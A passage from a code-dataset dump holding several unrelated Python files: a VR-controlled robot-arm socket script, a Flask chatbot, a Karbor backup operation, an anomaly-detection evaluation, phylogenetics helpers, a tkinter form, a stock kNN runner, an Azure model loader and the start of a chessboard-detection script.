wait()\n","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"563690605","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 20 15:05:53 2017\n\n@author: yshi321\n\"\"\"\n\nimport triad_openvr\n#import time\nimport sys\nimport socket\nimport re\nimport math\nimport numpy as np\n\n\nHOST = \"192.168.1.3\" # The remote host\nCLIENT = \"192.168.1.10\"\nPORT = 30000 # The same port as used by the server\nprint(\"Starting Program\")\ncount = 0\n\n#the pc is the server and the arm is the client\n\nX = 0\nY = 0\nZ = 0\nRX = 0\nRY = 0\nRZ = 0\n\nv = triad_openvr.triad_openvr()\nv.print_discovered_objects()\n\nposePosition = []\ntargetPosition1 = [0, 0, 0, 0, 0, 0]\n\nlowerLimit = float(0.1)\nupperLimit = float(0.55)\n\ni=0\nsample=25\n\nrxList = [0.04]*sample\nryList = [-3.12]*sample\nrzList = [-0.30]*sample\n\n#the socket is no longer opening and closing constantly which means that \n#the program on the touchpad needs to be running first then run this\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ns.bind((HOST, PORT)) # Bind to the port \ns.listen(5) # Now wait for client connection.\nc, addr = s.accept() # Establish connection with client.\nprint(\"Established Connection\")\n\n\nwhile (True):\n\n #reading 
controller coordinates\n txt = \"\"\n for each in v.devices[\"controller_1\"].get_pose_quaternion():\n txt += \"%.2f\" % each\n txt += \" \"\n targetPosition1 = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", str(txt))\n \n X = (float(targetPosition1[2]) + 2.3)\n \n if (X < lowerLimit) & (X >= 0):\n X = lowerLimit\n elif (X < 0) & (X > -lowerLimit):\n X = -lowerLimit\n elif X > upperLimit:\n X = upperLimit\n elif X < -upperLimit:\n X = -upperLimit\n# \n #Y axis is up and down\n Y = (float(targetPosition1[0]) + .3)\n# \n if (Y < lowerLimit) & (Y >= 0):\n Y = lowerLimit\n elif (Y < 0) & (Y > -lowerLimit):\n Y = -lowerLimit\n elif Y > upperLimit:\n Y = upperLimit\n elif Y < -upperLimit:\n Y = -upperLimit\n# \n #Z axis is forward and back\n Z = float(targetPosition1[1]) + 1.6\n\n if Z > 1.1-math.sqrt(X*X+Y*Y):\n Z = 1.1-math.sqrt(X*X+Y*Y)\n # next 3 numbers: \n qw=float(targetPosition1[3])\n qx=float(targetPosition1[4])\n qy=float(targetPosition1[5])\n qz=float(targetPosition1[6])\n \n angle = 2*math.acos(qw)\n x = qx / math.sqrt(1-qw*qw)\n y = qy / math.sqrt(1-qw*qw)\n z = qz / math.sqrt(1-qw*qw)\n \n T = qx*qy + qz*qw\n if (T > 0.499):\n yaw = 2*math.atan2(qx,qw)\n roll = math.pi/2\n pitch = 0\n elif (T < -0.499):\n yaw = -2*math.atan2(qx,qw)\n roll = -math.pi/2\n pitch = 0\n else:\n yaw = math.atan2(2*qy*qw - 2*qx*qz, 1- 2*qy*qy - 2*qz*qz)\n roll = math.asin(2*T)\n pitch = math.atan2(2*qx*qw - 2*qy*qz,1-2*qx*qx-2*qz*qz)\n \n #recalibrating\n yaw = -math.pi + yaw\n if yaw < -math.pi:\n yaw = yaw + 2*math.pi\n \n pitch = pitch - math.pi/2\n if (pitch > -1.5*math.pi) & (pitch < -math.pi):\n pitch = pitch+2*math.pi\n \n #converting pitch roll and yaw into RX RY AND RZ values \n \n pitchMatrix = np.matrix([\n [math.cos(-pitch), 0, math.sin(-pitch)],\n [0, 1, 0],\n [-math.sin(-pitch), 0, math.cos(-pitch)]\n ])\n \n rollMatrix = np.matrix([\n [1, 0, 0],\n [0, math.cos(roll), -math.sin(roll)],\n [0, math.sin(roll), math.cos(roll)]\n ])\n\n yawMatrix = np.matrix([\n [math.cos(yaw), -math.sin(yaw), 0],\n [math.sin(yaw), math.cos(yaw), 0],\n [0, 0, 1]\n ])\n \n \n R = yawMatrix * pitchMatrix * rollMatrix\n \n theta = math.acos(((R[0, 0] + R[1, 1] + R[2, 2]) - 1) / 2)\n \n if theta != 0 :\n multi = 1 / (2 * math.sin(theta))\n rx = multi * (R[2, 1] - R[1, 2]) * theta\n ry = multi * (R[0, 2] - R[2, 0]) * theta\n rz = multi * (R[1, 0] - R[0, 1]) * theta\n elif theta == 0:\n rx = 0\n ry = 0\n rz = 0\n\n #applying running average filter to the angles\n if i < sample:\n rxList[i]=float(rx)\n ryList[i]=float(ry)\n rzList[i]=float(rz)\n \n if i==(sample-1):\n i=0\n else:\n i=i+1\n\n rx = round(sum(rxList)/sample, 2)\n ry = round(sum(ryList)/sample, 2)\n rz = round(sum(rzList)/sample, 2)\n\n try:\n msg = c.recv(1024)\n posePosition = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", str(msg))\n# print('\\r', posePosition, end='')\n \n #msg = c.recv(1024)\n #jointPosition = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", str(msg))\n #print(\"Joint : \", jointPosition)\n #msg = c.recv(1024)\n #c.sendto((\"movel(p[\"+ str(X) + \", \" + str(Y) + \", \" + str(Z) + \", \" + str(RX) + \", \" + str(RY) + \", \" + str(RZ) + \"], a=1.3962634015954636, v=0.2)\"+ \"\\n\").encode(), (CLIENT, PORT)) \n #time.sleep(0.1)\n #if 'asking_for_data' in str(msg):\n # count = count + 1\n \n\n \n #next 3 numbers that need to be sent are the joint angles of the arm\n #these joint angles correspond to the pitch, yaw and roll\n \n \n #RX is the pitch\n #pitch from the targetPosition works where it is 0 at rest (horizontal)\n #rx = rx - float(posePosition[3])\n # ry 
is the roll\n # roll works similar to pitch where it is 0 at rest position (horizontal)\n #ry = ry - float(posePosition[4])\n # rz is the yaw \n # yaw is a bit weird, were it 0 and goes to +- 90 on either side and then mirrors itself \n # on the other side, so it goes -0 <- -90 <- 0 -> 90 -> 0\n #rz = rz - float(posePosition[5])\n \n # may need to have software limits on where the arm can go, but this comes from testing\n \n \n #time.sleep(0.5)\n #c.sendto((\"(\" + str(X) + \",\" + str(Y) + \",\" + str(Z) + \",\" + str(rx) + \",\" + str(ry) + \",\" + str(rz) + \")\").encode(),(CLIENT, PORT));\n c.sendto((\"(\" + str(X) + \",\" + str(Y) + \",\" + str(Z) + \",\" + str(rx) + \",\" + str(ry) + \",\" + str(rz) + \")\").encode(),(CLIENT, PORT));\n \n #printing posePosition and values sent to robot\n\n except socket.error as socketerror:\n print(\"Error\")\n \nc.close()\ns.close()\nprint(\"Program finish\")","sub_path":"Scripts/controller_v2.py","file_name":"controller_v2.py","file_ext":"py","file_size_in_byte":6166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"386521127","text":"from flask import Flask, render_template, request\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \n\nimport nltk\nfrom nltk.stem.lancaster import LancasterStemmer\nstemmer = LancasterStemmer()\n\nimport numpy\nimport tflearn\nimport tensorflow\nimport random\nimport json\nimport pickle\nfrom duckduckpy import query\nimport sqlite3\n\napp = Flask(__name__)\n\n\ntensorflow.compat.v1.logging.set_verbosity(tensorflow.compat.v1.logging.ERROR)\n\nwith open(\"./../data/intents.json\") as file:\n data = json.load(file)\n\ntry:\n with open(\"data.pickle\", \"rb\") as f:\n words, labels, training, output = pickle.load(f)\nexcept:\n words = []\n labels = []\n docs_x = []\n docs_y = []\n\n for intent in data[\"intents\"]:\n for pattern in intent[\"patterns\"]:\n wrds = nltk.word_tokenize(pattern)\n words.extend(wrds)\n docs_x.append(wrds)\n docs_y.append(intent[\"tag\"])\n\n if intent[\"tag\"] not in labels:\n labels.append(intent[\"tag\"])\n\n words = [stemmer.stem(w.lower()) for w in words if w != \"?\"]\n words = sorted(list(set(words)))\n\n labels = sorted(labels)\n\n training = []\n output = []\n\n out_empty = [0 for _ in range(len(labels))]\n\n for x, doc in enumerate(docs_x):\n bag = []\n\n wrds = [stemmer.stem(w.lower()) for w in doc]\n\n for w in words:\n if w in wrds:\n bag.append(1)\n else:\n bag.append(0)\n\n output_row = out_empty[:]\n output_row[labels.index(docs_y[x])] = 1\n\n training.append(bag)\n output.append(output_row)\n\n\n training = numpy.array(training)\n output = numpy.array(output)\n\n with open(\"data.pickle\", \"wb\") as f:\n pickle.dump((words, labels, training, output), f)\n\ntensorflow.reset_default_graph()\n\nnet = tflearn.input_data(shape=[None, len(training[0])])\nnet = tflearn.fully_connected(net, 8)\nnet = tflearn.fully_connected(net, 8)\nnet = tflearn.fully_connected(net, len(output[0]), activation=\"softmax\")\nnet = tflearn.regression(net)\n\ntry:\n model = tflearn.DNN(net)\n model.load(\"model.tflearn\")\nexcept:\n model = tflearn.DNN(net)\n\n model.fit(training, output, n_epoch=997, batch_size=8, show_metric=True)\n model.save(\"model.tflearn\")\n\ndef bag_of_words(s, words):\n bag = [0 for _ in range(len(words))]\n\n s_words = nltk.word_tokenize(s)\n s_words = [stemmer.stem(word.lower()) for word in s_words]\n\n for se in s_words:\n for i, w in enumerate(words):\n if w == se:\n bag[i] = 1\n \n return numpy.array(bag)\n\ndef 
duckduckgo_response(input_statement):\n try:\n response = query(input_statement, container='dict')\n except:\n return 'Sorry, cannot find anything about it. Please change the query and try again...'\n\n if response['abstract_text']:\n response_statement = response['abstract_text']\n # response_statement.confidence = 1\n else:\n response_statement = 'Sorry, cannot find anything about it. Please change the query and try again...'\n # response_statement.confidence = 0\n\n return response_statement\n\ndef create_table():\n try:\n conn = sqlite3.connect('bot.sqlite')\n\n cursor = conn.cursor()\n\n query = '''\n CREATE TABLE IF NOT EXISTS feedback(\n id INTEGER PRIMARY KEY, \n key TEXT UNIQUE,\n value TEXT\n )\n '''\n\n cursor.execute(query)\n except Exception as e:\n raise e\n finally:\n conn.commit()\n conn.close()\n\n\ndef get_feedback_response(request):\n try:\n conn = sqlite3.connect('bot.sqlite')\n cursor = conn.cursor()\n\n query = '''\n SELECT key, value\n FROM feedback\n WHERE key = ?\n '''\n\n cursor.execute(query, (request,))\n value = cursor.fetchone()\n except:\n return None\n finally:\n conn.commit()\n conn.close()\n \n return value\n\ndef set_feedback_response(request, response):\n try:\n conn = sqlite3.connect('bot.sqlite')\n cursor = conn.cursor()\n\n query = '''\n INSERT OR REPLACE INTO feedback (key, value)\n VALUES(?,?);\n '''\n\n cursor.execute(query, (request, response))\n except Exception as e:\n raise e\n finally:\n conn.commit()\n conn.close()\n\ndef chat(inp):\n # print(\"Start talking with the bot (type 'quit' or 'q' to stop)!\")\n # while True:\n # print('\\x1b[6;30;42m' + 'You:' + '\\x1b[0m', end=' ')\n # inp = input()\n # if inp.lower() == \"quit\" or inp.lower() == \"q\":\n # print('Bye Bye!')\n # break\n # elif inp is None:\n # continue\n\n previous_response = get_feedback_response(inp.lower())\n\n if(previous_response is None):\n results = model.predict([bag_of_words(inp, words)])[0]\n results_index = numpy.argmax(results)\n tag = labels[results_index]\n\n # print(results[results_index])\n\n if results[results_index] > 0.70:\n for tg in data[\"intents\"]:\n if tg['tag'] == tag:\n responses = tg['responses']\n response = random.choice(responses)\n else:\n response = duckduckgo_response(inp)\n else:\n response = previous_response[1]\n\n return response\n\n # print('\\x1b[6;30;44m' + 'Bot:' + '\\x1b[0m ', response)\n \n # get_feedback(inp.lower())\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n# @app.route(\"/get\")\n# def get_bot_response():\n# userText = request.args.get('msg')\n# return str(english_bot.get_response(userText))\n\n@app.route(\"/get\")\ndef get_bot_response():\n userText = request.args.get('msg')\n return str(chat(userText)).replace(\"\\n\", \"
\")\n # print(ans)\n # return ans\n\n\nif __name__ == \"__main__\":\n create_table()\n app.run()\n","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"411962501","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_utils import uuidutils\n\nfrom karbor.common import constants\nfrom karbor import context\nfrom karbor import exception\nfrom karbor.i18n import _\nfrom karbor import objects\nfrom karbor.services.operationengine.operations import base\n\n\nclass ProtectOperation(base.Operation):\n \"\"\"Protect operation.\"\"\"\n\n OPERATION_TYPE = \"protect\"\n\n def check_operation_definition(self, operation_definition):\n provider_id = operation_definition.get(\"provider_id\")\n if not provider_id or not uuidutils.is_uuid_like(provider_id):\n reason = _(\"Provider_id is invalid\")\n raise exception.InvalidOperationDefinition(reason=reason)\n\n plan_id = operation_definition.get(\"plan_id\")\n if not plan_id or not uuidutils.is_uuid_like(plan_id):\n reason = _(\"Plan_id is invalid\")\n raise exception.InvalidOperationDefinition(reason=reason)\n\n plan = objects.Plan.get_by_id(context.get_admin_context(), plan_id)\n if provider_id != plan.provider_id:\n reason = _(\"Provider_id is invalid\")\n raise exception.InvalidOperationDefinition(reason=reason)\n\n def _execute(self, operation_definition, param):\n log_ref = self._create_operation_log(param)\n self._run(operation_definition, param, log_ref)\n\n def _resume(self, operation_definition, param, log_ref):\n self._run(operation_definition, param, log_ref)\n\n def _run(self, operation_definition, param, log_ref):\n client = self._create_karbor_client(\n param.get(\"user_id\"), param.get(\"project_id\"))\n provider_id = operation_definition.get(\"provider_id\")\n plan_id = operation_definition.get(\"plan_id\")\n trigger_id = param.get(\"trigger_id\", None)\n scheduled_operation_id = param.get(\"scheduled_operation_id\", None)\n extra_info = {\n 'created_by': constants.OPERATION_ENGINE,\n 'trigger_id': trigger_id,\n 'scheduled_operation_id': scheduled_operation_id\n }\n try:\n client.checkpoints.create(provider_id, plan_id, extra_info)\n except Exception:\n state = constants.OPERATION_EXE_STATE_FAILED\n else:\n state = constants.OPERATION_EXE_STATE_SUCCESS\n\n self._update_log_when_operation_finished(log_ref, state)\n","sub_path":"karbor/services/operationengine/operations/protect_operation.py","file_name":"protect_operation.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"286548350","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom pyod.models.ocsvm import OCSVM\n\n# ts_train_df = pd.read_csv('data/Yahoo_S5/dataset/real_2_5%.csv')\n# # ts_train_df = pd.read_csv('data/Yahoo_S5/dataset/real_2_10%.csv')\n# # ts_test_df = 
pd.read_csv('data/Yahoo_S5/dataset/real_2_15%.csv')\n# print(ts_train_df.head())\n# train_dataset_value = ts_train_df.value.values[700:]\n# train_dataset_labels = ts_train_df.is_anomaly.values[700:]\n# train_dataset_timestamp = ts_train_df.timestamp.values[700:]\n# X_train = train_dataset_value.reshape((-1, 1))\n# y_train = train_dataset_labels.reshape((-1, 1))\n\n\nclf_name = 'OneClassSVM'\n# clf = OCSVM(contamination=0.05)\n# clf.fit(X_train)\n# # get the prediction labels and outlier scores of the training data\n# y_train_pred = clf.labels_ # binary labels (0: inliers, 1: outliers)\n# # Training set\n# # Indices of actual anomalies\n# train_actual_anomaly_index = np.where(train_dataset_labels == 1)[0]\n# # Indices of actual normal points\n# train_actual_normal_index = np.where(train_dataset_labels == 0)[0]\n# # Indices of predicted anomalies\n# train_pred_anomaly_index = np.where(y_train_pred == 1)[0]\n# # Indices of predicted normal points\n# train_pred_normal_index = np.where(y_train_pred == 0)[0]\n# train_TP = len(np.intersect1d(train_actual_anomaly_index, train_pred_anomaly_index))\n# train_TN = len(np.intersect1d(train_actual_normal_index, train_pred_normal_index))\n# train_FN = len(np.intersect1d(train_actual_anomaly_index, train_pred_normal_index))\n# train_accuracy = (train_TP + train_TN) / len(train_dataset_labels)\n# if len(train_pred_anomaly_index) == 0:\n# train_precision = 0\n# else:\n# train_precision = train_TP / len(train_pred_anomaly_index)\n# if (train_TP + train_FN) == 0:\n# train_recall = 0\n# else:\n# train_recall = train_TP / (train_TP + train_FN)\n# if train_precision == 0 or train_recall == 0:\n# train_F1_Score = 0\n# else:\n# train_F1_Score = 2 / (1 / train_precision + 1 / train_recall)\nprint(\"Model:\", 'OCSVM')\n# print(\"Dataset:\", 'real_2_5%')\n# print(\"Accuracy:\", '%.2f%%' % (train_accuracy * 100))\n# print(\"Precision:\", '%.2f%%' % (train_precision * 100))\n# print(\"Recall:\", '%.2f%%' % (train_recall * 100))\n# print(\"F1-Score:\", '%.2f%%' % (train_F1_Score * 100))\n\n\nfor i in [2, 3, 24, 30, 34, 38, 67]:\n # ts_test_df = pd.read_csv('data/Yahoo_S5/dataset/real_2_'+str(i)+'%.csv')\n # ts_test_df = pd.read_csv('data/Yahoo_S5/A1Benchmark/real_'+str(i)+'.csv')\n # ts_test_df = pd.read_csv('data/Yahoo_S5/dataset/real_'+str(i)+'_'+'5%.csv')\n ts_test_df = pd.read_csv('data/Yahoo_S5/dataset/real_'+str(i)+'_'+'10%.csv')\n # ts_test_df = pd.read_csv('data/Yahoo_S5/dataset/real_'+str(i)+'_'+'15%.csv')\n ts_test_df.head()\n test_dataset_value = ts_test_df.value.values[700:]\n test_dataset_labels = ts_test_df.is_anomaly.values[700:]\n test_dataset_timestamp = ts_test_df.timestamp.values[700:]\n X_test = test_dataset_value.reshape((-1, 1))\n y_test = test_dataset_labels.reshape((-1, 1))\n # train OCSVM detector\n contamination = 0.12\n clf = OCSVM(contamination=contamination)\n clf.fit(X_test)\n # get the prediction labels and outlier scores of the test data\n y_test_pred = clf.predict(X_test) # outlier labels (0 or 1)\n # y_test_scores = clf.decision_function(X_test) # outlier scores\n # Test set\n # Indices of actual anomalies\n test_actual_anomaly_index = np.where(test_dataset_labels == 1)[0]\n # Indices of actual normal points\n test_actual_normal_index = np.where(test_dataset_labels == 0)[0]\n # Indices of predicted anomalies\n test_pred_anomaly_index = np.where(y_test_pred == 1)[0]\n # Indices of predicted normal points\n test_pred_normal_index = np.where(y_test_pred == 0)[0]\n test_TP = len(np.intersect1d(test_actual_anomaly_index, test_pred_anomaly_index))\n test_TN = len(np.intersect1d(test_actual_normal_index, test_pred_normal_index))\n test_FN = len(np.intersect1d(test_actual_anomaly_index, test_pred_normal_index))\n test_accuracy = (test_TP + test_TN) 
/ len(test_dataset_labels)\n if len(test_pred_anomaly_index) == 0:\n test_precision = 0\n else:\n test_precision = test_TP / len(test_pred_anomaly_index)\n if (test_TP + test_FN) == 0:\n test_recall = 0\n else:\n test_recall = test_TP / (test_TP + test_FN)\n if test_precision == 0 or test_recall == 0:\n test_F1_Score = 0\n else:\n test_F1_Score = 2 / (1 / test_precision + 1 / test_recall)\n # print(\"Dataset:\", 'real_2_'+str(i)+'%')\n # print(\"Dataset:\", 'real_' + str(i) + '_'+'2%.csv')\n # print(\"Dataset:\", 'real_' + str(i) + '_'+'5%.csv')\n print(\"Dataset:\", 'real_' + str(i) + '_' + '10%.csv')\n # print(\"Dataset:\", 'real_' + str(i) + '_' + '15%.csv')\n print(\"contamination:\", contamination)\n print(\"Accuracy:\", '%.2f%%' % (test_accuracy * 100))\n print(\"Precision:\", '%.2f%%' % (test_precision * 100))\n print(\"Recall:\", '%.2f%%' % (test_recall * 100))\n print(\"F1-Score:\", '%.2f%%' % (test_F1_Score * 100))","sub_path":"Compare_Approaches/OCSVM_train.py","file_name":"OCSVM_train.py","file_ext":"py","file_size_in_byte":4975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"467629206","text":"__author__ = 'kgori'\n\nimport pllpy\n\nclass PLLException(Exception):\n pass\n\n\ndef create_instance(alignment, partitions, tree, threads=1, rns=int(\"0xCA55E77E\", 16)):\n try:\n with open(alignment):\n pass\n except IOError as exc:\n raise exc\n\n if tree in ['random', 'parsimony']:\n if tree == 'random':\n instance = pllpy.pll(alignment, partitions, False, threads, rns)\n else:\n instance = pllpy.pll(alignment, partitions, True, threads, rns)\n else:\n instance = pllpy.pll(alignment, partitions, tree, threads, rns)\n return instance\n\n\ndef set_partition_model_parameters(instance, partition, alpha, freqs, rates, empirical_freqs, equal_freqs):\n \"\"\"\n Sets parameter values for a specific partition.\n\n :param instance: PLL instance being modified\n :param partition: Number of the partition having its parameters set\n :param alpha: Alpha parameter of the 4-category discrete gamma rates distribution\n :param freqs: Equilibrium frequencies of states (4 for DNA, 20 for aa)\n :param rates: Relative substitution rate parameters - values of the upper triangle of 4x4 matrix,\n so 6 numbers in all. The sixth value must be 1.0. Assume matrix is in \"acgt\" order.\n Only applies to DNA data; protein models all use empirical rates.\n :param empirical_freqs: Use empirical estimates for state frequencies. 
Overwrites 'freqs'.\n :param equal_freqs: Set all state frequencies to 1/num_states\n :return: void\n \"\"\"\n if empirical_freqs:\n freqs = instance.get_empirical_frequencies()[partition]\n elif equal_freqs:\n if instance.is_dna(partition):\n freqs = [0.25] * 4\n else:\n freqs = [0.05] * 20\n if alpha is not None:\n instance.set_alpha(alpha, partition, True)\n if freqs is not None:\n instance.set_frequencies(freqs, partition, True)\n if rates is not None:\n instance.set_rates(rates, partition, True)\n\n\ndef set_params_from_dict(instance, model):\n \"\"\"\n Sets parameters of pll instance according to dict\n :param instance: pll instance\n :param model: dict describing pll model parameters\n :return:\n \"\"\"\n p_info = model['partitions']\n for i in range(instance.get_number_of_partitions()):\n alpha = p_info[i].get('alpha')\n freqs = p_info[i].get('frequencies')\n rates = p_info[i].get('rates')\n set_partition_model_parameters(instance, i, alpha, freqs, rates, False, False)\n return instance\n\n\ndef pll_to_dict(instance):\n \"\"\"\n Summarises parameter values from PLL instance and writes their values\n to disk in a json format file\n\n :param instance: PLL instance being summarised\n :param json_file: Either a filepath or a file-like stream (e.g. sys.stdout)\n :return: void\n \"\"\"\n model = {'ml_tree': instance.get_tree(), 'likelihood': instance.get_likelihood(), 'partitions': {}}\n for i in range(instance.get_number_of_partitions()):\n data = {'alpha': instance.get_alpha(i), 'frequencies': instance.get_frequencies_vector(i)}\n if instance.is_dna(i):\n data['rates'] = instance.get_rates_vector(i)\n data['model'] = instance.get_model_name(i)\n data['name'] = instance.get_partition_name(i)\n model['partitions'][i] = data\n return model\n","sub_path":"treeCl/utils/pll_helpers.py","file_name":"pll_helpers.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"359739189","text":"#!/usr/bin/env python \n# -*- coding:utf-8 -*-\n# Author: ChrisChan\n# Purpose:\nfrom tkinter import *\n\n'''\n1. This program implements text box input.\n2. The grid method is used to arrange widgets in an Excel-like table layout.\n3. A submit Button is used to retrieve the user's input.\n'''\nroot = Tk()\n\nLabel1 = Label(root, text='Member name:').grid(row=0, column=0)\nLabel2 = Label(root, text='Member ID:').grid(row=1, column=0)\n\nv1 = StringVar()\np1 = StringVar()\ne1 = Entry(root, textvariable=v1) # Entry is the Tkinter widget used to receive string input.\ne2 = Entry(root, textvariable=p1, show='#')\ne1.grid(row=0, column=1, padx=10, pady=5) # Set where the entry box is displayed, along with its width and height\ne2.grid(row=1, column=1, padx=10, pady=5)\n\n\ndef show():\n print(\"Member name: %s\" % e1.get()) # Get the information entered by the user\n print(\"Member ID: %s\" % e2.get())\n\nButton(root, text='Verify info', width=10, command=show).grid(row=2, column=0, sticky=W, padx=10, pady=5)\nButton(root, text='Quit', width=10, command=root.quit).grid(row=2, column=1, sticky=E, padx=10, pady=5)\n\nmainloop()","sub_path":"输入框和验证输入内容.py","file_name":"输入框和验证输入内容.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"439949869","text":"# kNN cross-validation\n\nfrom com.lufaxin.stock.service.business.CombinService import CombinService\nfrom com.lufaxin.stock.service.business.ml.KNN_QMZX_NewService import KNN_QMZX_NewService\nfrom com.lufaxin.stock.service.business.StockKnnCrossValidationCalService import StockKnnCrossValidationCalService\nfrom com.lufaxin.stock.service.business.StockKnnLigntAnalogCalService import StockKnnLigntAnalogCalService\nimport time\nimport threading\nfrom 
com.lufaxin.stock.util import CfgUtil\nfrom com.lufaxin.stock.util import InputCfgUtil\n\n# th_num:2|mid:1\nconfig_str = input(\"Please enter config:\")\n\ncfg = InputCfgUtil.ana_cfg(config_str)\n\nth_num = InputCfgUtil.get_int(cfg, \"th_num\", 1)\nmid = InputCfgUtil.get_int(cfg, \"mid\", 1)\n\nc_v_ser = StockKnnCrossValidationCalService()\nknn_new_ser = KNN_QMZX_NewService()\n\n# Clear previously computed results\nc_v_ser.clean_old_val(mid)\n\n# Get the groups based on the number of threads\nitems_groups, vld_d = c_v_ser.get_group(mid, th_num)\n\nlight_ser = StockKnnLigntAnalogCalService()\n\n# All indicator data\n# datas = knn_new_ser.get_cal_data(1, 3500)\ndatas = light_ser.get_between_datas(\"2015-10-01\", \"2018-05-25\")\n\nths = []\n\nfor i in range(0, len(items_groups)):\n items_group = items_groups[i]\n # datas, items, dis_type, val_time, vld_per\n stock_th = threading.Thread(target=c_v_ser.cal_items, args=(datas, items_group, vld_d[\"JLLX\"], vld_d[\"YZCS\"], vld_d[\"YBBL\"], vld_d[\"MID\"]))\n ths.append(stock_th)\n\nif __name__ == '__main__':\n for t in ths:\n t.setDaemon(True)\n t.start()\n for t in ths:\n t.join()\n","sub_path":"com/lufaxin/stock/app/Stock_Knn_Cross_Vld_App.py","file_name":"Stock_Knn_Cross_Vld_App.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"234920090","text":"from PIL import Image\nfrom io import BytesIO\nfrom azure.storage.blob import *\n\nimport pickle\nimport os.path\nimport json\nimport requests\nimport numpy as np\nimport gzip\n\n# model libraries - these can change, based on the model you are using!\nfrom sklearn.neighbors import KNeighborsClassifier\n\ndef load_model():\n try:\n with open(\"./config.json\", \"r\") as config_file:\n config = json.load(config_file)\n block_blob_service = BlockBlobService(account_name=config['blob']['account_name'], \n account_key=config['blob']['account_key'])\n container = config['model']['container']\n generator = block_blob_service.list_blobs(container)\n model = None\n for blob in generator:\n if(blob.name != config['model']['name']):\n continue\n \n path = \"data/{}\".format(blob.name)\n if(not os.path.exists(path)):\n print('Loading model...')\n block_blob_service.get_blob_to_path(container, blob.name, path)\n\n model = open_model(path)\n print('Model loaded!')\n return model\n except Exception as e:\n raise Exception(\"Model could not be loaded. 
Error: {}\".format(str(e)))\n\ndef open_model(path):\n    if(path[-3:] == \".gz\"):\n        model_file = gzip.open(path,'rb')\n    else:\n        model_file = open(path, 'rb')\n    model = pickle.load(model_file,encoding='utf-8')\n    return model\n\ndef process_image(img_url):\n    o_img = get_image(img_url)\n    p_img = pad_image(o_img)\n    r_img = reshape_image(p_img)\n    r_arr = np.array(r_img)\n    n_arr = normalize(r_arr)\n    return n_arr\n    \ndef label_and_prob(arr, model):\n    pred_label = model.predict(arr.flatten().reshape(1,-1))\n    pred_prob = model.predict_proba(arr.flatten().reshape(1,-1))\n    index = np.where(model.classes_ == pred_label)\n    return (pred_label[0], pred_prob[0][index][0])\n\ndef get_image(img_url):\n    response = requests.get(img_url)\n    new_image = Image.open(BytesIO(response.content)).convert('RGB')\n    return new_image\n\ndef pad_image(img, color = (255,255,255)):\n    max_size = max(img.size)\n    background = Image.new('RGB', (max_size, max_size), color)\n    img_w, img_h = img.size\n    bg_w, bg_h = background.size\n    offset = ((int)((bg_w - img_w) / 2), (int)((bg_h - img_h) / 2))\n    background.paste(img, offset)\n    return background\n\ndef reshape_image(img, size = (128,128)):\n    try:\n        img.thumbnail(size, Image.ANTIALIAS)\n        return img\n    except IOError:\n        print('Error')\n\ndef normalize(arr):\n    \"\"\"\n    Linear normalization\n    http://en.wikipedia.org/wiki/Normalization_%28image_processing%29\n    \"\"\"\n    arr = arr.astype('float')\n    # Do not touch the alpha channel\n    for i in range(3):\n        minval = arr[...,i].min()\n        maxval = arr[...,i].max()\n        if minval != maxval:\n            arr[...,i] -= minval\n            arr[...,i] *= ( 255.0 / ( maxval - minval ) )\n    return arr","sub_path":"api/modelHelper.py","file_name":"modelHelper.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"274882999","text":"import PIL.Image\nimport matplotlib.pyplot as plt\nimport scipy.ndimage\nimport cv2 # For Sobel etc\nimport numpy as np\nfrom helpers import *\nfrom line_intersection import *\nfrom chess_detect_helper import *\nfrom rectify_refine import *\nimport os\nnp.set_printoptions(suppress=True) # Better printing of arrays\n\nSAVE_RECTIFIED = False # Save rectified images out\nSAVE_PLOT = False # Save plots (doesn't need to visualize)\nSHOW_PLOTS = True # Visualize plots\n\ninput_folder = \"input2\"\noutput_folder = \"rectified\"\nplot_folder = \"plots\"\n\n\nfor i in [23]:\n    filename =\"%02d.jpg\" % i\n#   for filename in os.listdir(input_folder):\n    filepath = \"%s/%s\" % (input_folder,filename)\n    output_filename = output_folder+\"/\"+filename[:-3]+\"png\"\n    # if (os.path.exists(output_filename)):\n    #   print(\"%s exists, skipping %s\" % (output_filename, filename))\n    #   continue\n\n    print(\"Processing %s\" % filename)\n    img_orig = scaleImageIfNeeded(PIL.Image.open(filepath))\n\n    # Grayscale\n    img = np.array(img_orig.convert('L')) # grayscale uint8 numpy array\n\n    # Local Histogram Equalization\n    # TODO : Currently breaks line detection 